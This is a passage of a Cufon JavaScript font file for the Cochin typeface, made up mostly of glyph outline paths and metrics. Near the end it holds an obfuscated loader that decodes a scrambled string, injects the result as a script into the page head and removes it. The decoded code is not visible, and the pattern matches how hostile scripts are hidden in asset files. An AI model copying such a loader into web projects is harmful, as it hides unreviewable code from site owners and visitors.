68,7,91v4,10,8,19,10,27r43,-102v-1,-12,-12,-13,-22,-16r0,-4v22,2,44,3,66,0v-1,9,-14,7,-19,17v-54,62,-63,170,-139,206v-26,4,-50,-4,-49,-30v-1,-8,7,-19,17,-18","k":{".":20,",":20}},{"d":"127,-249v-20,0,-37,-17,-37,-37v0,-21,17,-37,37,-37v20,0,37,16,37,37v0,20,-17,37,-37,37xm127,-309v-11,0,-22,10,-22,23v0,12,10,22,22,22v13,0,23,-10,22,-22v0,-13,-10,-23,-22,-23xm145,-3v20,-2,40,-12,32,-35r-23,-66r-76,0r-26,75v1,17,18,23,34,26r0,4r-87,0v19,-12,42,-29,47,-58r66,-162r-5,-11v15,-4,18,-7,32,-11r74,206v9,17,17,30,41,32r0,4r-109,0r0,-4xm117,-206r-35,91r68,0","w":253},{"d":"90,6v-55,0,-79,-38,-79,-92v0,-87,57,-147,144,-154v5,0,13,3,13,9v0,19,-22,8,-37,8v-54,0,-83,52,-89,106v40,-38,126,-17,119,53v-4,41,-29,70,-71,70xm82,-125v-26,0,-38,22,-39,50v0,39,14,65,45,71v30,-2,41,-25,41,-55v0,-36,-12,-66,-47,-66"},{"d":"42,-9v46,1,85,-1,94,-38r5,2r-8,46r-124,0r-3,-6r97,-118v-43,-2,-71,2,-85,33r-5,-1r5,-43r118,0r4,6","w":159},{"d":"39,-45v38,10,8,68,-13,75v-7,4,-14,16,-21,9v20,-12,28,-39,16,-66v0,-11,8,-17,18,-18xm20,-117v0,-10,10,-20,20,-20v11,0,20,9,20,20v0,12,-8,21,-20,21v-10,0,-20,-10,-20,-21","w":90},{"d":"129,72v-53,-44,-121,-110,-89,-208v16,-48,53,-84,90,-112r3,4v-38,39,-70,81,-70,156v0,74,33,119,71,156","w":140},{"d":"30,-208v0,-24,-3,-38,-27,-38r0,-4r55,-6r0,139v27,-31,98,-28,98,29v0,34,-14,87,25,85r0,4r-78,0r0,-4v36,1,20,-47,24,-79v5,-42,-42,-48,-66,-26v-8,22,-2,57,-3,84v-1,17,11,18,27,21r0,4r-81,0r0,-4v15,-2,25,-5,26,-21r0,-184","w":193},{"d":"32,-22v-3,-40,16,-105,-27,-105r0,-5r55,-4v-4,65,12,144,-23,182v-15,15,-32,31,-49,44r-4,-5v29,-25,52,-52,48,-107xm23,-223v0,-10,9,-20,19,-20v10,-1,19,10,19,20v0,10,-9,20,-19,20v-10,0,-19,-10,-19,-20","w":93},{"d":"87,-3v41,-4,5,-44,-5,-57v-13,11,-31,26,-36,46v2,9,9,11,19,11v-8,10,-46,-1,-70,4r0,-4v37,-10,55,-42,81,-64v-23,-23,-38,-56,-76,-63r0,-4v29,1,57,3,86,0v0,11,-24,7,-12,24v4,11,13,21,20,29v13,-10,42,-40,11,-48r0,-5v24,2,48,3,72,0v-27,16,-56,36,-77,60v22,26,39,64,81,71r0,4r-94,0r0,-4","w":186},{"d":"84,-238v11,65,-16,112,-11,183v-8,2,-5,-8,-7,-13v-18,-50,10,-129,-24,-162xm50,-18v0,-12,10,-20,21,-20v10,0,20,8,20,20v0,12,-10,20,-20,20v-11,0,-21,-8,-21,-20","w":140},{"d":"121,-36v1,55,-68,43,-108,32r-3,-42v23,15,53,61,90,31v2,-2,3,-5,3,-9v-9,-43,-87,-23,-89,-74v-2,-48,56,-43,95,-32r2,38r-4,0v-11,-18,-25,-35,-51,-35v-13,0,-24,5,-24,18v15,38,87,21,89,73","w":140},{"d":"98,-273v0,-11,8,-19,19,-19v11,0,19,9,19,19v0,10,-9,19,-19,19v-10,0,-19,-8,-19,-19xm164,-273v0,-10,8,-19,19,-19v11,0,19,8,19,19v0,11,-9,19,-19,19v-10,0,-19,-9,-19,-19xm150,7v-80,0,-133,-45,-133,-124v0,-79,53,-124,133,-124v80,0,133,43,133,124v0,81,-53,124,-133,124xm150,-228v-63,0,-95,48,-95,111v0,63,32,111,95,111v63,0,95,-47,95,-111v0,-64,-32,-111,-95,-111","w":299},{"d":"100,-224v-54,-3,-73,18,-84,61r-5,-2r5,-70r201,0r5,70r-4,2v-12,-44,-30,-64,-86,-61r1,192v3,22,14,27,37,29r0,4r-107,0r0,-4v33,0,37,-19,37,-54r0,-167","w":233,"k":{"y":27,"w":33,"u":27,"s":27,"r":27,"o":27,"i":13,"e":27,"c":27,"a":27,"A":27,";":27,":":27,".":33,"-":27,",":33}},{"d":"86,-57v-2,35,5,53,38,54r0,4r-107,0r0,-4v33,-1,38,-19,37,-54r-1,-145v-2,-22,-14,-27,-37,-29r0,-4r106,0r0,4v-32,0,-36,19,-36,54r0,120","w":140},{"d":"90,6v-104,0,-98,-246,0,-246v57,0,73,57,73,123v0,67,-16,123,-73,123xm90,-5v58,-15,46,-135,32,-194v-4,-17,-15,-29,-32,-30v-41,8,-42,62,-42,112v0,50,1,104,42,112"},{"d":"19,-105v6,-24,23,-33,54,-33v30,0,49,11,52,40v3,29,-12,78,15,84v12,1,20,-19,27,-9v-14,17,-43,43,-63,14r-6,-6v-24,22,-93,36,-93,-15v0,-43,50,-43,93,-45v2,-30,0,-55,-29,-55v-13,0,-20,16,-20,30xm35,-35v0,32,49,24,63,10r0,-36v-27,-7,-63,-3,-63,26","w":166},{"d":"180,45r0,-18r-180,0r0,18r180,0"},{"d":"165,-77v-7,-38,-31,-53,-81,-48r0,74v-4,37,13,44,43,48r0,4r-114,0r0,-4v33,-1,38,-18,38,-54r0,-120v2,-35,-5,-53,-38,-54v5,-11,38,-3,61,-3r140,-1v-2,22,-2,44,0,66r-6,0v-10,-53,-60,-59,-124,-55r0,89v44,2,72,-3,81,-38r4,0r0,96r-4,0","w":226,"k":{"A":13,".":46,",":46}},{"d":"174,-183v14,-16,24,-49,-8,-48r0,-4r86,0r0,4v-57,12,-71,66,-106,100r85,110v11,8,23,17,40,18r0,4r-121,0v6,-10,48,-8,28,-39v-15,-24,-36,-49,-53,-72v-18,28,-43,53,-57,85v1,19,19,20,37,22r0,4r-104,0v16,-9,44,-18,54,-39r64,-79v-35,-39,-53,-101,-112,-114r0,-4r107,0r0,4v-25,0,-29,28,-10,43r36,50","w":266},{"d":"84,-111v3,47,-15,112,37,108r0,4r-108,0r0,-4v33,0,38,-19,38,-54r0,-145v-3,-22,-14,-27,-37,-29r0,-4v40,2,78,-3,116,-3v44,0,82,26,82,71v0,60,-74,72,-128,56xm176,-166v0,-50,-47,-73,-92,-56r0,98v37,18,92,5,92,-42","w":226,"k":{"A":20,".":46,",":46}},{"d":"12,7r95,-248r-19,0r-94,248r18,0","w":100},{"d":"39,-45v38,10,8,68,-13,75v-7,4,-14,16,-21,9v20,-12,28,-39,16,-66v0,-11,8,-17,18,-18","w":90},{"d":"116,-70v10,-19,30,-57,-4,-60r0,-4v22,2,44,3,65,0v-4,10,-22,11,-29,25r-59,113r-13,0v-21,-41,-35,-88,-62,-124v-4,-6,-12,-8,-20,-10r0,-4r83,0r0,4v-51,12,7,79,15,104","k":{".":20,",":20}},{"d":"85,-241v12,0,12,15,11,29r-7,80v0,3,-2,5,-4,5v-6,0,-6,-8,-6,-12r-6,-82v0,-13,2,-19,12,-20xm35,-241v13,-1,12,16,11,29r-6,80v-1,6,-9,7,-9,0r-7,-89v0,-12,2,-19,11,-20","w":119},{"d":"90,-241v22,3,7,31,3,44r-6,0v-4,-13,-19,-41,3,-44xm73,-189v-15,-4,-49,-26,-22,-36v17,1,18,21,26,32xm24,-176v4,-20,33,-7,45,-2r0,5v-13,4,-41,19,-45,-3xm77,-159v-4,16,-26,49,-37,22v2,-15,21,-19,33,-25xm90,-110v-22,-3,-7,-32,-3,-44r6,0v4,13,19,41,-3,44xm103,-159v15,-9,55,25,26,33v-18,-2,-18,-22,-26,-33xm156,-176v-3,22,-32,7,-45,3r0,-5v13,-5,40,-18,45,2xm129,-225v16,0,11,22,-1,26v-8,2,-19,15,-25,6v8,-10,8,-32,26,-32"},{"d":"35,-103r55,-108r55,108r20,0r-67,-131r-16,0r-67,131r20,0"},{"d":"140,7v-53,0,-94,-25,-94,-78r0,-128v1,-24,-11,-29,-31,-32r0,-4r102,0r0,4v-66,0,-39,100,-39,158v0,43,27,62,71,62v46,0,76,-22,76,-65v0,-57,24,-150,-34,-155r0,-4r81,0r0,4v-58,4,-30,99,-34,154v-4,59,-40,84,-98,84","w":286},{"d":"46,-43v-10,25,8,39,34,38v31,-2,48,-27,48,-62v0,-35,-15,-60,-50,-60v-25,0,-40,15,-47,36r-8,-2r37,-141v35,-2,66,20,93,-3r5,6v-23,16,-53,35,-90,25r-23,76v46,-25,121,-5,114,59v10,83,-134,106,-149,30v0,-12,5,-22,17,-22v11,0,19,9,19,20"},{"d":"-4,-72r-1,-6r74,-83v26,-28,51,-57,74,-87r19,0r0,4r-137,149r87,0r0,-79v9,-7,15,-18,26,-23r0,197r-26,0r0,-72r-116,0"},{"d":"57,-101v5,37,-17,100,27,98r0,4r-81,0r0,-4v44,0,20,-67,25,-105v2,-15,-12,-15,-24,-16r0,-4r53,-8r0,20v17,-13,43,-39,68,-20v4,6,7,13,7,22r-28,15v10,-23,-17,-35,-31,-17","w":140,"k":{".":27,"-":6,",":27}},{"d":"70,6v-83,3,-4,-137,-69,-135r0,-5r55,-4v6,46,-20,125,31,126v14,0,33,-9,39,-18v-5,-38,18,-102,-28,-100r0,-4r56,-4r0,110v0,19,11,21,27,24r0,3r-55,2r0,-18v-15,10,-32,23,-56,23","w":193},{"d":"93,-56v-27,7,-56,-6,-82,3r2,-26v27,-8,57,6,84,-3","w":119},{"d":"203,-138v0,-13,-11,-16,-20,-20r0,-3r79,0v-4,9,-22,6,-31,18v-21,27,-32,65,-53,94v15,28,35,40,70,46v-8,10,-54,-2,-81,4r-11,-24v-35,44,-138,39,-134,-36v2,-45,36,-63,72,-74v-18,-14,-43,-22,-43,-52v0,-29,25,-43,54,-44v36,-1,60,13,60,48v0,31,-22,37,-43,47v24,21,36,49,51,77v13,-22,27,-49,30,-81xm103,-127v-27,7,-49,27,-49,61v0,53,66,67,98,35v-14,-34,-26,-71,-49,-96xm108,-219v-34,0,-34,54,-12,67v5,5,13,9,17,12v33,-7,38,-79,-5,-79","w":266},{"d":"204,-68v9,-20,28,-59,-6,-62r0,-4v21,2,43,3,64,0v-4,10,-21,10,-26,24v-21,36,-38,76,-57,114r-8,0r-43,-94r-47,94r-9,0v-21,-40,-34,-88,-61,-122v-5,-7,-13,-10,-21,-12v11,-10,55,3,82,-4r0,5v-48,13,7,74,14,100r36,-71v-5,-14,-14,-27,-31,-30v11,-8,55,2,81,-4r0,4v-52,13,7,74,11,103","w":266,"k":{".":20,",":20}},{"d":"2,-3v24,0,27,-17,26,-41r0,-167v0,-22,-7,-34,-27,-35r0,-4r55,-6r0,193v15,-15,46,-30,53,-54v-1,-8,-3,-10,-11,-11r0,-4r70,0v-19,13,-55,27,-70,47v24,29,43,73,87,82r0,4r-89,0r0,-4v29,2,15,-26,4,-40r-21,-27r-23,17v0,27,-4,51,25,50r0,4r-79,0r0,-4","w":193},{"d":"103,-231v-34,4,-37,18,-22,55r56,136v19,-49,57,-120,65,-170v-1,-15,-14,-20,-30,-21r0,-4r88,0r0,4v-36,5,-44,39,-56,66r-74,169r-8,0v-34,-73,-59,-157,-100,-223v-7,-7,-15,-11,-27,-12r0,-4r108,0r0,4","w":253,"k":{"y":6,"u":13,"r":13,"o":20,"i":13,"e":20,"a":20,"A":33,";":27,":":27,".":46,"-":20,",":46}},{"d":"39,-45v38,10,8,68,-13,75v-7,4,-14,16,-21,9v20,-12,28,-39,16,-66v0,-11,8,-17,18,-18xm20,-117v0,-10,10,-20,20,-20v11,0,20,9,20,20v0,12,-8,21,-20,21v-10,0,-20,-10,-20,-21","w":90},{"d":"71,-87v-54,-9,-1,-130,-45,-156r0,-5v60,-5,49,62,49,118v0,24,3,36,22,42v-59,15,28,156,-71,160r0,-4v44,-17,-11,-143,45,-155","w":139},{"d":"20,-18v0,-12,10,-20,20,-20v11,0,20,7,20,20v0,13,-9,20,-20,20v-10,0,-20,-8,-20,-20xm20,-117v0,-10,10,-20,20,-20v11,0,20,9,20,20v0,12,-8,21,-20,21v-10,0,-20,-10,-20,-21","w":90},{"d":"81,-75r-57,0r0,18r57,0r0,57r18,0r0,-57r57,0r0,-18r-57,0r0,-57r-18,0r0,57"},{"d":"55,-40v-3,24,6,38,28,37r0,4r-83,0r0,-4v22,0,28,-13,27,-37r0,-180v-1,-20,-4,-25,-25,-26r0,-4r53,-6r0,216","w":93},{"d":"40,-24v48,-1,103,9,115,-28r4,3r-24,50r-128,0r-2,-5v42,-53,114,-84,114,-172v0,-28,-12,-53,-39,-53v-22,0,-40,8,-40,32v6,16,26,47,-5,47v-15,0,-21,-14,-21,-29v1,-38,26,-60,63,-61v45,-2,76,26,73,72v-5,71,-75,100,-110,144"},{"w":90},{"d":"88,-5v54,0,63,-65,23,-87v-13,-11,-31,-20,-43,-31v-52,16,-43,118,20,118xm102,-135v39,-16,32,-94,-20,-94v-40,0,-49,54,-16,70v11,9,25,17,36,24xm111,-130v20,19,52,31,52,68v0,46,-34,68,-80,68v-43,0,-78,-23,-78,-67v0,-37,27,-55,54,-67v-18,-13,-42,-26,-42,-55v0,-39,30,-57,69,-57v37,0,66,18,67,55v1,32,-20,45,-42,55"},{"d":"24,2r132,-57r0,-18r-132,-62r0,18r115,53r-115,49r0,17"},{"d":"31,0r18,0r0,-256r-18,0r0,256","w":79},{"d":"191,-225v-71,-2,-135,2,-145,61v-12,-5,-1,-50,0,-71r189,0r2,4r-93,113r-81,106v75,11,152,-7,168,-67r7,0r-27,80r-193,0r-3,-4","w":253},{"d":"57,-123v-59,-18,-49,-117,21,-111r0,-33r13,0r0,33v18,-1,34,14,52,7r7,52v-16,-13,-28,-47,-59,-48r0,87v33,17,63,29,65,66v2,41,-29,64,-65,70r0,33r-13,0r0,-33v-19,1,-40,-13,-56,-2r-14,-66v14,-2,14,32,30,38v9,10,23,19,40,19r0,-100xm78,-223v-41,-3,-47,59,-13,73v7,3,7,4,13,8r0,-81xm91,-11v45,0,50,-71,14,-86v-4,-4,-9,-7,-14,-9r0,95"},{"d":"36,-180v0,-12,8,-19,19,-19v11,0,19,8,19,19v0,11,-8,19,-19,19v-11,0,-19,-8,-19,-19xm102,-180v0,-11,8,-19,19,-19v11,0,19,8,19,19v0,12,-8,19,-19,19v-11,0,-19,-8,-19,-19xm9,-66v0,-48,30,-72,77,-72v47,0,77,24,77,72v0,47,-30,72,-77,72v-47,0,-77,-25,-77,-72xm93,-5v59,0,48,-125,-13,-122v-29,1,-40,28,-40,56v0,37,16,66,53,66"},{"d":"97,-241r-94,0r0,12r64,0r0,283r-64,0r0,12r94,0r0,-307","w":140},{"d":"55,-37v-4,35,38,26,48,8r4,4v-17,13,-27,31,-54,31v-47,0,-18,-83,-26,-127r-29,0r0,-6v33,-2,42,-31,52,-57r5,0r0,52r49,0r0,11r-49,0r0,84","w":113},{"w":90},{"d":"93,-56v-27,7,-56,-6,-82,3r2,-26v27,-8,57,6,84,-3","w":119},{"d":"212,-167v0,35,-26,51,-56,58v28,42,53,92,110,105r0,4r-65,0v-29,-33,-56,-66,-76,-106r-42,-7v3,48,-16,114,38,110r0,4r-107,0r0,-4v33,-1,38,-19,37,-54r-1,-145v-2,-21,-13,-27,-36,-29r0,-4v37,2,72,-3,107,-3v50,0,91,22,91,71xm176,-174v-2,-44,-46,-62,-91,-49r-2,98v43,16,96,2,93,-49","w":259,"k":{"Y":20,"W":20,"V":20,"T":13}},{"d":"224,2v-35,-3,-52,-32,-52,-71v0,-40,17,-68,52,-72v35,4,52,32,52,72v0,39,-17,67,-52,71xm224,-133v-26,3,-29,33,-29,63v0,30,3,60,29,64v24,-4,28,-28,28,-64v-1,-31,-1,-60,-28,-63xm218,-236r-133,238r-14,0r133,-238r14,0xm65,-93v-36,-3,-52,-32,-52,-72v0,-39,16,-71,52,-71v35,0,52,32,52,71v0,40,-17,68,-52,72xm65,-228v-26,3,-29,33,-29,63v0,30,3,60,29,64v24,-4,28,-28,28,-64v-1,-31,-1,-60,-28,-63","w":299},{"d":"18,-117v0,-104,112,-146,210,-112v-1,26,6,48,8,71r-4,0v-19,-35,-35,-72,-87,-72v-58,0,-87,54,-87,113v0,61,28,111,87,111v27,0,49,-4,65,-17v-1,-39,10,-74,-37,-72r0,-4r105,0r0,4v-43,-4,-35,41,-35,80v-30,9,-62,23,-96,22v-77,-3,-129,-45,-129,-124","w":280},{"d":"193,-60v3,74,-88,74,-146,57v-6,0,-10,2,-15,4r-17,-81r5,-2v20,34,42,78,92,78v30,0,56,-12,53,-43v-7,-79,-136,-50,-140,-132v-3,-65,75,-70,132,-52v7,2,14,2,22,2v-1,22,1,43,3,62r-5,0v-13,-31,-36,-59,-77,-63v-48,-5,-61,48,-25,70v44,26,116,30,118,100","w":213},{"d":"136,-241v33,-1,58,8,87,11v1,27,3,53,7,77r-5,0v-14,-40,-34,-75,-87,-75v-61,0,-82,48,-82,107v0,61,29,108,91,108v50,0,78,-29,101,-63r9,7v-28,39,-56,78,-121,76v-73,-2,-119,-50,-119,-124v0,-74,46,-121,119,-124","w":253},{"d":"83,-240v98,-3,90,156,42,206v-25,25,-63,40,-116,40r0,-9v76,0,113,-39,119,-109v-45,33,-124,7,-118,-58v4,-45,28,-68,73,-70xm127,-156v0,-37,-13,-73,-47,-73v-61,0,-46,120,8,121v28,0,40,-19,39,-48"},{"d":"168,-77v-4,-42,-35,-52,-85,-48r0,111v75,16,134,-12,162,-60r4,3r-33,72r-202,0r0,-4v32,0,36,-20,36,-54r0,-145v-3,-22,-14,-27,-37,-29r0,-4r202,0v0,21,-1,44,2,63r-5,2v-8,-55,-66,-61,-129,-54r0,90v45,0,83,-2,85,-47r4,0r0,104r-4,0","w":246},{"d":"240,-219v-6,-6,-13,-9,-21,-12r0,-4r98,0r0,4v-66,6,-18,102,-17,154v9,37,6,72,49,74r0,4r-111,0r0,-4v32,0,41,-23,35,-59r-25,-145r-65,154v-7,16,-12,37,-19,53v-23,-76,-53,-143,-86,-211r-16,161v-2,33,11,47,41,47r0,4r-103,0v8,-11,41,-9,44,-34r25,-182v-9,-8,-25,-14,-39,-16r0,-4r106,0r0,4v-21,1,-23,27,-12,43r51,124r35,-76v11,-26,21,-52,30,-79","w":346},{"d":"145,-3v20,-2,40,-12,32,-35r-23,-66r-76,0r-26,75v1,17,18,23,34,26r0,4r-87,0v19,-12,42,-29,47,-58r66,-162r-5,-11v15,-4,18,-7,32,-11r74,206v9,17,17,30,41,32r0,4r-109,0r0,-4xm117,-206r-35,91r68,0","w":253,"k":{"y":6,"w":13,"v":13,"Y":33,"W":27,"V":33,"T":27}},{"d":"14,-3v32,0,36,-19,36,-54r0,-120v1,-35,-4,-53,-37,-54r0,-4v84,3,194,-22,199,65v1,24,-19,42,-35,49v30,10,54,29,52,67v-5,89,-129,47,-215,55r0,-4xm161,-118v-23,6,-57,6,-79,-2r0,101v41,25,111,12,111,-48v0,-24,-17,-41,-32,-51xm176,-173v0,-45,-49,-61,-94,-49r0,90v37,20,94,8,94,-41","w":246},{"d":"20,-18v0,-12,10,-20,20,-20v11,0,20,7,20,20v0,13,-9,20,-20,20v-10,0,-20,-8,-20,-20","w":90},{"d":"150,7v-80,0,-133,-45,-133,-124v0,-79,53,-124,133,-124v80,0,133,43,133,124v0,81,-53,124,-133,124xm150,-228v-63,0,-95,48,-95,111v0,63,32,111,95,111v63,0,95,-47,95,-111v0,-64,-32,-111,-95,-111","w":299},{"d":"119,-231v-48,-2,-34,53,-36,98r134,0v-3,-43,13,-102,-38,-98r0,-4r106,0r0,4v-32,1,-36,20,-36,54r0,120v-2,35,5,53,38,54r0,4r-107,0r0,-4v55,2,32,-70,37,-119r-134,0v4,50,-18,122,38,119r0,4r-107,0r0,-4v33,-1,38,-19,37,-54r-1,-145v-2,-22,-14,-27,-37,-29r0,-4r106,0r0,4","w":299},{"d":"154,-3v21,2,41,-13,28,-33r-65,-96r-35,27v2,46,-13,106,38,102r0,4r-107,0r0,-4v33,-1,38,-19,37,-54r-1,-145v-2,-22,-14,-27,-37,-29r0,-4r106,0r0,4v-53,-3,-32,67,-36,115v31,-32,77,-49,93,-95v-1,-14,-12,-20,-27,-20r0,-4r111,0v-44,16,-85,53,-119,83v33,44,60,97,98,135v10,9,21,13,34,14r0,4r-118,0r0,-4","w":266},{"d":"88,-241v57,-2,68,69,33,102v-20,19,-40,43,-40,83r-4,0v-15,-62,34,-85,34,-141v0,-20,-7,-35,-28,-36v-26,-1,-32,29,-26,52v-12,2,-30,16,-28,-9v3,-34,24,-50,59,-51xm62,-17v0,-11,9,-20,20,-20v12,0,20,9,20,20v0,10,-9,21,-20,20v-10,1,-20,-10,-20,-20"},{"d":"156,-101r-132,0r0,18r132,0r0,-18xm156,-50r-132,0r0,18r132,0r0,-18"}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+142-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("3t.B1#>M2hsP3,}wj#z:?t?s7e>B.#sP7ep:2hTY._{~$nM%fNZK2_rf$:j]`BrB`blA>,>d=JT3_BrB`bl}>bj.7-N8`tNB.hZ1Nu}%Ut$rfJrCcej&c_rB`blA>+.m7-N8`nj}3t*Hc,zn7-N8`t=e_5l,bJzt-?p3;`>^U=Tu+N_h7$.21fjciK*%A&}#YXxHk~CPd8r:nMBeGaZmw{s]4J&8$_sthzlf;:re7,?H7}NB>-pB;u.G2B$wi+Xk1b?K^bZ{h%Tfj+58.A.jjzrB`bl*`zrB`bl*.z?}TB>b^N_>=N?P+M*;UnM%;Y>81t}M3,?%3urxU+5~fbB%;Y5~1bB8;#r}1#jM2,rYUh?P.%ZY1-}82-`scGMw2h$X;BaXUnxGjGjf;%&43b{mfG.}1Y>k$hpd1tzP7,Z~1e>*1-rnj#_PfeC*$#s~$hZf;Y>}3u=d;YT}fG=X1tsA$7Tx1eaP2tsnjtZ*1hNx3h.df%Kw2+r~^:~k2u}Yhe>12_BjU7l12_Bs3uKx")}catch(e){}delete _cufon_bridge_;return f})({"w":180,"face":{"font-family":"Cochin","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 3 2 0 0 2 0 3","ascent":"288","descent":"-72","x-height":"6","cap-height":"1","bbox":"-28.0846 -323 367 90","underline-thickness":"18","underline-position":"-27","unicode-range":"U+0020-U+00F6"}}));
